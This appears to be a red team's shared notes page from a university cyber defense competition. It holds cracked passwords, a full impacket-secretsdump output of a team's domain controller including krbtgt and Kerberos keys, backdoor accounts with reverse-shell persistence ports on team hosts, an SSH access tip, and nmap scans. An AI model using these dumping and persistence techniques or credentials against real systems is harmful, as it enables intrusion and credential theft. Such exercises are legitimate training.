Competition Information
Uploaded Files:
ISU1_2025_Scenario.pdf
Red Drive: https://drive.google.com/drive/folders/1boWq_YXtPTGKCAhEvhfAaW5Z0mbCvdeARed Debrief: Red Debrief - Google Slides
Flag Locations
Add content here...
General Help and Information
Uploaded Files:
persist.py,
team4_wstn_history.png,
linpeas.sh,
TEAM4,
TEAM1,
TEAM8,
TEAM5,
TEAM7,
TEAM4,
evil_publish.py,
post_server.py
Weather Stations (WSTN) may have "AllowGroups" at end of
/etc/ssh/sshd_config; remove this if you want to login as anyone via
SSH.
team8
8 1 2 41 1D 11 90 57 45 6C 38 77 37 50 39 69 77
8 1 2 2E 7 D4 39 64 FC E 5B 46 96 8C 85 A5 4B
team3
3 6 23 92 6F E5 68 51 AD DD F9 D9 85 CE CA 6D 9D
3 6 23 92 6F E5 68 51 AD DD F9 D9 85 CE CA 6D 9D
team1
5 1 5A 1 F4 F7 92 79 CE 18 1F 58 CB A7 29 31 B9
team4
4 1 28 8A F2 86 85 81 4F 94 95 1D 7D 77 A4 9A BA
Admins:
tina.bell
SHARED CREDS = subscriber
barry.hill:c000000 laura.lewis:jw2180 charles.combs:yosoyjuni1 lisa.petersen:superchao35
Team 2 NTLM cracked:
24ebb9518470547f22a7dc742078b652:soc714rub 2f87c2be8b36ed73feed18592042b4f6:sop940tub 4bc783cc26b87bcf09ee5a0b0184a85a:kej255fic 845b6848f37874bb584de2dcc586486d:daf495foc 5e844b80c8a12c6f7773d8d0762d0399:pen313sed e0491423702b2dcaa67390c1f775d1b0:wup914duf 919f5d014efeadc6be0a2db92e75179a:gas186luh 53d04c6bfb17e7c98880506bc23ebc14:sut957ruj 15ed2774a65fb5d14e6ad29f69884064:jeb297her 7a0b4c2176b2f19f40bce4b869450768:mok482hew 5f3cae14a5a7a650d08639ef4fc647da:qeb382moy 99c61063f338f1dea5278c475099b91e:c000000 c4cd60d0dde4a027e037eea626c4f839:jw2180 198101b27a24152164fe997b336787fe:yosoyjuni1 7ff65da6324122e3311ee840892695f7:superchao35
Team 2 NTLM dump: impacket-secretsdump Administrator:cdc@ad.team2.isucdc.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x558d2300c893a304210d94e2a792d180
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TEAM2\AD$:aes256-cts-hmac-sha1-96:b2d0de6610afa2215c630e74f1ee6b2021803063649a6e9e80a864c69332a9af
TEAM2\AD$:aes128-cts-hmac-sha1-96:c0b58a68cab11e0588e3ffddb3338c14
TEAM2\AD$:des-cbc-md5:078fdfba9be3b58a
TEAM2\AD$:plain_password_hex:f7416d69282036b7379e064c0cccf22b83c8bf563358f3ef0c5ed3067e566d74982137279e59f7effc7aaafae060587fbb019a0b7e194516ad7be19451e75801e4c9f6a747bf654cedf72d4100c5112508611822fbd52177290c15be3191115ce21f97d5348c78e6461c5b8d0bbf2b4cd9b3f07b88136f8bac81c3d1e83841d612abfd216ea9d38f480c25ce7cc65503516b50d0db223de997a17cc08a71063ac9c3b721184b5a11af3fe4598e649477f25638e2d9e70ae4050413ab629835a3688490435cd9e833cab548e9b6bbdf21848fa2c9d5b2c732fec0f9c18d50cf02fa1f2daf11b10253dc1ee29320153100
TEAM2\AD$:aad3b435b51404eeaad3b435b51404ee:900ddbbc7f142de3db54523c60943465:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb156a10e29b5cdb86f660d2eff55b34f9b30eca9
dpapi_userkey:0x1bae462c2744e6bb587e92bf6ab48bb1262f1c47
[*] G$MSRADIUSPRIVKEY
0000 BC CF D3 A8 51 63 0E 5C 7B 10 26 87 DF 66 09 40 ....Qc.\{.&..f.@
0010 96 0B B5 BD FE 34 CA 80 A8 DC C9 B5 48 A6 61 F4 .....4......H.a.
0020 7A 8A 83 37 4E E6 E1 5F 6E EB B6 DC 3A 86 59 76 z..7N.._n...:.Yv
0030 CD 4C 47 B8 9E 98 FC 6C 3C FE 33 54 EE 37 51 73 .LG....l<.3T.7Qs
0040 0A 66 36 4A CF 46 65 62 BF 4C C1 F7 CF 9A F8 97 .f6J.Feb.L......
0050 36 9D 0D 0B BC 24 C9 5C 66 37 49 C3 7A 3D F1 AD 6....$.\f7I.z=..
0060 AA B6 92 B3 E1 FF 08 7A 78 70 8F CB 31 F9 F1 A4 .......zxp..1...
0070 86 5B 0C 5B E8 8E 2B F6 13 2F 4C 1C 1B 71 AA 39 .[.[..+../L..q.9
0080 10 82 C7 EF AC 0E F8 C4 FE 24 BC 4C 6C 94 B4 6D .........$.Ll..m
0090 AC 89 D9 9E 13 59 E8 FF A4 EC AA 46 4A A6 80 09 .....Y.....FJ...
00a0 4A 3E 91 01 D5 75 5C 2D 7D 3D 3B 50 65 41 1C 4B J>...u\-}=;PeA.K
00b0 73 5B 1C 94 50 4C 79 AE D6 B2 FC 61 56 31 3D 74 s[..PLy....aV1=t
00c0 53 46 EA 11 31 16 35 F1 5E 2A 6B 00 DB A7 D0 31 SF..1.5.^*k....1
00d0 5A 88 F6 79 64 41 5A 58 1B 4D D7 9B 19 1D 35 79 Z..ydAZX.M....5y
00e0 F4 76 5C 62 86 72 1F 52 34 B0 4E E2 A1 85 32 F4 .v\b.r.R4.N...2.
00f0 A5 AC 25 8C 22 60 E1 43 9C 4D BE 9B 02 AC A7 0A ..%."`.C.M......
G$MSRADIUSPRIVKEY:bccfd3a851630e5c7b102687df660940960bb5bdfe34ca80a8dcc9b548a661f47a8a83374ee6e15f6eebb6dc3a865976cd4c47b89e98fc6c3cfe3354ee3751730a66364acf466562bf4cc1f7cf9af897369d0d0bbc24c95c663749c37a3df1adaab692b3e1ff087a78708fcb31f9f1a4865b0c5be88e2bf6132f4c1c1b71aa391082c7efac0ef8c4fe24bc4c6c94b46dac89d99e1359e8ffa4ecaa464aa680094a3e9101d5755c2d7d3d3b5065411c4b735b1c94504c79aed6b2fc6156313d745346ea11311635f15e2a6b00dba7d0315a88f67964415a581b4dd79b191d3579f4765c6286721f5234b04ee2a18532f4a5ac258c2260e1439c4dbe9b02aca70a
[*] NL$KM
0000 CB 29 1A AF 7D BF E8 20 69 E8 D9 9E 40 DB 0D 6D .)..}.. i...@..m
0010 7D C2 53 C4 DF 55 27 23 E8 DF 5A A9 91 37 9E 38 }.S..U'#..Z..7.8
0020 4B E2 7D B6 92 89 11 38 93 D5 08 B1 93 A3 3B EF K.}....8......;.
0030 8C 80 6B 25 D5 4B FE 41 1B 43 3C 43 AF 93 70 A2 ..k%.K.A.CNL$KM:cb291aaf7dbfe82069e8d99e40db0d6d7dc253c4df552723e8df5aa991379e384be27db69289113893d508b193a33bef8c806b25d54bfe411b433c43af9370a2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:dd3ff4f6910ae04b07b990bfa0fa8c3b:::
cdc:1000:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Richard:1001:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
tina.bell:1110:aad3b435b51404eeaad3b435b51404ee:53d04c6bfb17e7c98880506bc23ebc14:::
jennifer.smith:1111:aad3b435b51404eeaad3b435b51404ee:15ed2774a65fb5d14e6ad29f69884064:::
rebecca.contreras:1112:aad3b435b51404eeaad3b435b51404ee:5f3cae14a5a7a650d08639ef4fc647da:::
samantha.little:1113:aad3b435b51404eeaad3b435b51404ee:e0491423702b2dcaa67390c1f775d1b0:::
timothy.williams:1114:aad3b435b51404eeaad3b435b51404ee:2f87c2be8b36ed73feed18592042b4f6:::
amanda.garcia:1115:aad3b435b51404eeaad3b435b51404ee:919f5d014efeadc6be0a2db92e75179a:::
michelle.allen:1116:aad3b435b51404eeaad3b435b51404ee:4bc783cc26b87bcf09ee5a0b0184a85a:::
gary.wallace:1117:aad3b435b51404eeaad3b435b51404ee:7a0b4c2176b2f19f40bce4b869450768:::
natasha.davis:1118:aad3b435b51404eeaad3b435b51404ee:5e844b80c8a12c6f7773d8d0762d0399:::
jerome.mason:1119:aad3b435b51404eeaad3b435b51404ee:24ebb9518470547f22a7dc742078b652:::
mark.miller:1120:aad3b435b51404eeaad3b435b51404ee:845b6848f37874bb584de2dcc586486d:::
charles.combs:1121:aad3b435b51404eeaad3b435b51404ee:198101b27a24152164fe997b336787fe:::
lisa.petersen:1122:aad3b435b51404eeaad3b435b51404ee:7ff65da6324122e3311ee840892695f7:::
laura.lewis:1123:aad3b435b51404eeaad3b435b51404ee:c4cd60d0dde4a027e037eea626c4f839:::
barry.hill:1124:aad3b435b51404eeaad3b435b51404ee:99c61063f338f1dea5278c475099b91e:::
AD$:1002:aad3b435b51404eeaad3b435b51404ee:900ddbbc7f142de3db54523c60943465:::
NEWS$:1125:aad3b435b51404eeaad3b435b51404ee:10f126de02d32cbcd70a934b55479b29:::
JD$:1126:aad3b435b51404eeaad3b435b51404ee:ccd9d4f510cfc7767639fefee4f191f7:::
LTV$:1127:aad3b435b51404eeaad3b435b51404ee:cbade04a5cbb252433ac4075f583bcb0:::
WSTN$:1128:aad3b435b51404eeaad3b435b51404ee:4d6df9dd4b51b529b97078f158508c1d:::
WWW$:1129:aad3b435b51404eeaad3b435b51404ee:5ac994abf04566a66ea8c17c38713023:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9fb7f31d7f2daa5528c304e4252183b11a5682c8d587a03d612d59cfc2168cdb
Administrator:aes128-cts-hmac-sha1-96:3bb5e5c4ed4a846eb10cd1788b7d924f
Administrator:des-cbc-md5:9751ce40c2137f0b
krbtgt:aes256-cts-hmac-sha1-96:1b19ca03c7e790d4b698923e7c9e35466dfaed0cf56a074194c11f13b88862ba
krbtgt:aes128-cts-hmac-sha1-96:7152195d6eb6a155bed4ea1e940f48c8
krbtgt:des-cbc-md5:7a042fe0ea7a3d46
cdc:aes256-cts-hmac-sha1-96:f2d61b149492d99264742220f4161ae7e4cd642a703a750d97ba1ec0f89e4c43
cdc:aes128-cts-hmac-sha1-96:85cc82dfe44678818d19b535decfe3ef
cdc:des-cbc-md5:5152130e07a18c73
Richard:aes256-cts-hmac-sha1-96:b536c05bf30f8d05e9399614768549891671825b79fd54199d9db42a27518503
Richard:aes128-cts-hmac-sha1-96:102822a5bde8bbeab32b628bc3bee108
Richard:des-cbc-md5:26703797d96e7f5d
tina.bell:aes256-cts-hmac-sha1-96:d5b5ee3721078cff8cabaaaed3b24529492b95ba0d8728e37d5d3d00f3015d5f
tina.bell:aes128-cts-hmac-sha1-96:485824879b6861bd1224f66aa7796ce6
tina.bell:des-cbc-md5:135d130713b9976b
jennifer.smith:aes256-cts-hmac-sha1-96:92354e1f3f5ac6b019ec8682b9c2c3fbf53888f9110a280a6508960929cb8d94
jennifer.smith:aes128-cts-hmac-sha1-96:35913c1f8450e0a1bdd302747dcbcebf
jennifer.smith:des-cbc-md5:aefd4c85b3672619
rebecca.contreras:aes256-cts-hmac-sha1-96:ae3316cccdf12d9f342d87bb3e48ca46f8ea302cb76ed840ee7eecff7e62482c
rebecca.contreras:aes128-cts-hmac-sha1-96:3fd5fee00c27cd004ec3b1b9ca6a4dc8
rebecca.contreras:des-cbc-md5:45070e1537ceaeb0
samantha.little:aes256-cts-hmac-sha1-96:f372c93b036a54e220fe74dfb4ae0960fb5fdc3db063b837e502e2b539b2ef26
samantha.little:aes128-cts-hmac-sha1-96:d5296c60e54acc1e09d20c87e15e009a
samantha.little:des-cbc-md5:f2b0d526a7205875
timothy.williams:aes256-cts-hmac-sha1-96:e30a421c795069a062836f49854879b492e4a1542abc4e860a3f42046467e9c8
timothy.williams:aes128-cts-hmac-sha1-96:9d48936614bc45c1a6cc4e9f59b186ce
timothy.williams:des-cbc-md5:08d3f8e673c173d6
amanda.garcia:aes256-cts-hmac-sha1-96:9b932a133e54b9ef480508be0a7f0fadbc70f1a6a50aee15f707143d2a1befd7
amanda.garcia:aes128-cts-hmac-sha1-96:f7b17ccbf254f8d10ff0d1ef618cbdce
amanda.garcia:des-cbc-md5:e99e109e6bad54d9
michelle.allen:aes256-cts-hmac-sha1-96:c53b7b2b5f91b4d1c0e88f31f36af228fe9791c320b94894fcfd9c24b3735e01
michelle.allen:aes128-cts-hmac-sha1-96:b6e06798b97f2b6f8be9e60f54edfb68
michelle.allen:des-cbc-md5:67107fb96d4c915b
gary.wallace:aes256-cts-hmac-sha1-96:387e9c4a5a4c712f28e624f2df81c4d40166371124975d4e2f0fd1b6c81a4cbb
gary.wallace:aes128-cts-hmac-sha1-96:ff50b5ef51834ad6ba8d5a3e53915caf
gary.wallace:des-cbc-md5:5786318fe6eaf84f
natasha.davis:aes256-cts-hmac-sha1-96:12d1ca46683daa96e5c035e821ba6cfba48b2a5b8f274646766484438011f90c
natasha.davis:aes128-cts-hmac-sha1-96:8431e4f04de90c2c8dd68e019712de02
natasha.davis:des-cbc-md5:45d0fd45916bae6e
jerome.mason:aes256-cts-hmac-sha1-96:18d41b92310e19137ccfc575d6d290aec7d3163fad8caef2e426e469927f02ea
jerome.mason:aes128-cts-hmac-sha1-96:7127a8da2d01dfb66be868677972d165
jerome.mason:des-cbc-md5:45153ec401e38694
mark.miller:aes256-cts-hmac-sha1-96:92a8c3df3d25883d1e53b14b4e690073771b6f43059d9c773f5ba7ce5d68d621
mark.miller:aes128-cts-hmac-sha1-96:9d529527df59be4c5a80d796752cc897
mark.miller:des-cbc-md5:04f8495dfbef4654
charles.combs:aes256-cts-hmac-sha1-96:e6e08d28d705d0c028fe6d88631bd84ac4e5dfe307f451ec99353b55d6145b43
charles.combs:aes128-cts-hmac-sha1-96:02be86542df78d16c21ba83a7275e0d2
charles.combs:des-cbc-md5:31340192b904d010
lisa.petersen:aes256-cts-hmac-sha1-96:984039f16c8fa7e22bfb68cd8cca70e57f4b9d05953a043c834729829ed935b0
lisa.petersen:aes128-cts-hmac-sha1-96:fd7e180d8b2905f952a83fa94e966f41
lisa.petersen:des-cbc-md5:86f7570ecbba85ec
laura.lewis:aes256-cts-hmac-sha1-96:afb05f50d309853047dcbe173eccf9c10e445293bcedae90cdfe905c5f1ab6f7
laura.lewis:aes128-cts-hmac-sha1-96:91f807be2cbfbe4f82c077ba10643f0c
laura.lewis:des-cbc-md5:26a113fdb30b94ba
barry.hill:aes256-cts-hmac-sha1-96:718a808b210c1eef257bb5a7955763b3225d828ac7a26ea3cc4ba99bf684c44a
barry.hill:aes128-cts-hmac-sha1-96:087fb36d892cf5524911a67fc51b379d
barry.hill:des-cbc-md5:861c9dd39ece9e54
AD$:aes256-cts-hmac-sha1-96:b2d0de6610afa2215c630e74f1ee6b2021803063649a6e9e80a864c69332a9af
AD$:aes128-cts-hmac-sha1-96:c0b58a68cab11e0588e3ffddb3338c14
AD$:des-cbc-md5:97490e7a0b1986bc
NEWS$:aes256-cts-hmac-sha1-96:7926a2558a52efb734005fdcd26dd14c3d2001eb6f54019886e1ff7567c95bb4
NEWS$:aes128-cts-hmac-sha1-96:eefe1267d65f43a2ed6ac315d5202411
NEWS$:des-cbc-md5:babaae317ad5c73b
JD$:aes256-cts-hmac-sha1-96:5c16d0dfd970d4407ea1350de863ad966c68ec0ea945aa2c9d6570982117a52c
JD$:aes128-cts-hmac-sha1-96:490201d1c749fe0ef9c0a10b09d3272f
JD$:des-cbc-md5:19ef01c7ea4c51c4
LTV$:aes256-cts-hmac-sha1-96:5049e7e15c071c761009bd248d4fc4daf5296547cdadbd147f72b59986051ede
LTV$:aes128-cts-hmac-sha1-96:07d51c6d5ef6ac31e0386802523e45c1
LTV$:des-cbc-md5:20ae86d938a451dc
WSTN$:aes256-cts-hmac-sha1-96:ead9d005a461d07d775b5685d3c610146d0ece560af3b1c948d8f7deb4c15544
WSTN$:aes128-cts-hmac-sha1-96:3eb84b8960d782c45f0d3863cdc821ff
WSTN$:des-cbc-md5:0d920e203b61b5da
WWW$:aes256-cts-hmac-sha1-96:52da55c6bca5c11d03f9ebfb1125d4983549fb8f9ec26a1f805804ccf6edcc2b
WWW$:aes128-cts-hmac-sha1-96:b549fa6303e87ef31810398867af1c2f
WWW$:des-cbc-md5:13b35ea77657ef67
[*] ClearText passwords grabbed
krbtgt:CLEARTEXT:0x6bd50105e559b507fac56fcab0903c3abcbafa69177f883912dbf7542c8096ee6adb01b3888182df79a617e7038c0f8d1e0aa036044bd6a1146736d6a9c299af88fa870a694552a8b30989d2b7b37ed51dd3a57d20210068b06d42069f576794ca89db0e2f7c745d40cc0e4a3164642c3a29c0e5faf93a67aed388bf8cb90364dd447f37386b2800dff77b4c388b952afabdfffcc7a22272645054faa3ffdf94a7cd2dac78ef611558f263a2b684fced32e81de083b01725c5dd81a2239ad2035bb487dc396edfe85d854a64068dedea247e6cf0ed31dcecb9ac180de36aa60b66c73b878c5eb1c2ab5ace7c5fd6d5e3229e400a916b0b53ec7932033c5ce838e898c98ad8ba49d799f0233aa1002451a63c380459c2addeadfd7329d1eaf9fa1e2a323e833c873ed29c8e9ec373b9ddf9c8cd31a37483d363bcb480593983febb3e861f82731992ca9635fe58e992a4b21160f9a3ec12fa4d25e49cdf810ac1faf3b37450a11e256801451c3dcb97c221faecb15428f972cf8d5c75dda9efb2dc31c74be0ede419c0522c8d2063153d3d107ef18cdb1c4aac65595300c01d50fddcc4959664daf36e68e6cc5219dc48d5e95b868e87043e59400ca16281043e5d5f8da16fca2d73885cef326d9a03a633e780a48525f9cb303dce9bbd28b12cc0c4b871b991058ea72dc943a3f5cf701d44b5e9182a08d6fbdae569d15113bd
AD$:CLEARTEXT:0xf7416d69282036b7379e064c0cccf22b83c8bf563358f3ef0c5ed3067e566d74982137279e59f7effc7aaafae060587fbb019a0b7e194516ad7be19451e75801e4c9f6a747bf654cedf72d4100c5112508611822fbd52177290c15be3191115ce21f97d5348c78e6461c5b8d0bbf2b4cd9b3f07b88136f8bac81c3d1e83841d612abfd216ea9d38f480c25ce7cc65503516b50d0db223de997a17cc08a71063ac9c3b721184b5a11af3fe4598e649477f25638e2d9e70ae4050413ab629835a3688490435cd9e833cab548e9b6bbdf21848fa2c9d5b2c732fec0f9c18d50cf02fa1f2daf11b10253dc1ee29320153100
PERSISTENCE:
Persistence = setup a listener on the given ports to get a shell back! :)
ltv.team6.isucdc.com - user tunnel:tunnelsALLday, persistence on port 4444
news.team6.isucdc.com - user reset:tunnelsALLday, persistence on port 4447
wstn.team6.isucdc.com - user sproxy:tunnelsALLday, persistence on port 4451
www.team6.isucdc.com">http://www.team6.isucdc.com">www.team6.isucdc.com">http://www.team6.isucdc.com">www.team6.isucdc.com">http://www.team6.isucdc.com">www.team6.isucdc.com - user dubs:tunnelsALLday, persistence on port 4454
ltv.team7.isucdc.com - user tunnel:tunnelsALLday, persistence on port 4445
news.team7.isucdc.com - user reset:tunnelsALLday, persistence on port 4448
wstn.team7.isucdc.com - user sproxy:tunnelsALLday, persistence on port 4450
www.team7.isucdc.com">http://www.team7.isucdc.com">www.team7.isucdc.com">http://www.team7.isucdc.com">www.team7.isucdc.com">http://www.team7.isucdc.com">www.team7.isucdc.com - user dubs:tunnelsALLday, persistence on port 4452
ltv.team2.isucdc.com - user tunnel:tunnelsALLday, persistence on port 4446
news.team2.isucdc.com - user reset:tunnelsALLday, persistence on port 4449
www.team2.isucdc.com">http://www.team2.isucdc.com">www.team2.isucdc.com">http://www.team2.isucdc.com">www.team2.isucdc.com">http://www.team2.isucdc.com">www.team2.isucdc.com - user dubs:tunnelsALLday, persistence on port 4453
wstn.team2.isucdc.com - user sproxy:tunnelsALLday, persistence on port 4455
news.team5.isucdc.com - user reset:tunnelsALLday
NMAP (team6)
ad
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
```
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-04 14:42:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: team6.isucdc.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: team6.isucdc.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ad.team6.isucdc.com
| Not valid before: 2025-09-05T01:19:41
|_Not valid after: 2026-03-07T01:19:41
|_ssl-date: 2025-10-04T14:44:20+00:00; -42s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEAM6
| NetBIOS_Domain_Name: TEAM6
| NetBIOS_Computer_Name: AD
| DNS_Domain_Name: team6.isucdc.com
| DNS_Computer_Name: ad.team6.isucdc.com
| DNS_Tree_Name: team6.isucdc.com
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-04T14:43:40+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49681/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-04T14:43:41
|_ start_date: N/A
|_clock-skew: mean: -42s, deviation: 0s, median: -42s
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-04 14:42:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: team6.isucdc.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: team6.isucdc.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ad.team6.isucdc.com
| Not valid before: 2025-09-05T01:19:41
|_Not valid after: 2026-03-07T01:19:41
|_ssl-date: 2025-10-04T14:44:20+00:00; -42s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEAM6
| NetBIOS_Domain_Name: TEAM6
| NetBIOS_Computer_Name: AD
| DNS_Domain_Name: team6.isucdc.com
| DNS_Computer_Name: ad.team6.isucdc.com
| DNS_Tree_Name: team6.isucdc.com
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-04T14:43:40+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49681/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-04T14:43:41
|_ start_date: N/A
|_clock-skew: mean: -42s, deviation: 0s, median: -42s
````
jd
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
```
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=jd.team6.isucdc.com
| Not valid before: 2025-09-07T16:21:48
|_Not valid after: 2026-03-09T16:21:48
| rdp-ntlm-info:
| Target_Name: TEAM6
| NetBIOS_Domain_Name: TEAM6
| NetBIOS_Computer_Name: JD
| DNS_Domain_Name: team6.isucdc.com
| DNS_Computer_Name: jd.team6.isucdc.com
| DNS_Tree_Name: team6.isucdc.com
| Product_Version: 10.0.22621
|_ System_Time: 2025-10-04T14:44:57+00:00
5040/tcp open unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-04T14:45:02
|_ start_date: N/A
|_clock-skew: mean: -42s, deviation: 0s, median: -43s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
```
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=jd.team6.isucdc.com
| Not valid before: 2025-09-07T16:21:48
|_Not valid after: 2026-03-09T16:21:48
| rdp-ntlm-info:
| Target_Name: TEAM6
| NetBIOS_Domain_Name: TEAM6
| NetBIOS_Computer_Name: JD
| DNS_Domain_Name: team6.isucdc.com
| DNS_Computer_Name: jd.team6.isucdc.com
| DNS_Tree_Name: team6.isucdc.com
| Product_Version: 10.0.22621
|_ System_Time: 2025-10-04T14:44:57+00:00
5040/tcp open unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-04T14:45:02
|_ start_date: N/A
|_clock-skew: mean: -42s, deviation: 0s, median: -43s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
```
ltv
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 0c:7c:02:eb:5a:9f:e2:95:66:c1:1e:06:cf:84:cf:47 (DSA)
| 2048 45:37:39:b5:8f:c6:b9:78:ab:1e:41:dd:81:59:6e:cf (RSA)
| 256 89:e9:f1:4a:c8:d9:39:1f:07:8d:d4:60:3c:19:c4:dd (ECDSA)
|_ 256 58:de:71:85:95:40:51:64:3b:9e:e9:9c:eb:fd:f8:38 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 0c:7c:02:eb:5a:9f:e2:95:66:c1:1e:06:cf:84:cf:47 (DSA)
| 2048 45:37:39:b5:8f:c6:b9:78:ab:1e:41:dd:81:59:6e:cf (RSA)
| 256 89:e9:f1:4a:c8:d9:39:1f:07:8d:d4:60:3c:19:c4:dd (ECDSA)
|_ 256 58:de:71:85:95:40:51:64:3b:9e:e9:9c:eb:fd:f8:38 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
news
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
```
PORT STATE SERVICE VERSION
21/tcp open ftp OpenBSD ftpd 6.4 (Linux port 0.17)
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 35:79:94:a9:8d:d5:06:f3:5b:b6:c7:31:79:62:de:08 (RSA)
| 256 95:a6:a9:0f:80:04:10:e4:8b:a0:0b:68:6b:39:07:e8 (ECDSA)
|_ 256 95:78:e1:ee:dc:0e:f6:2b:a3:0d:dd:aa:e0:8f:a7:cd (ED25519)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=news
| Subject Alternative Name: DNS:news
| Not valid before: 2025-08-30T21:36:15
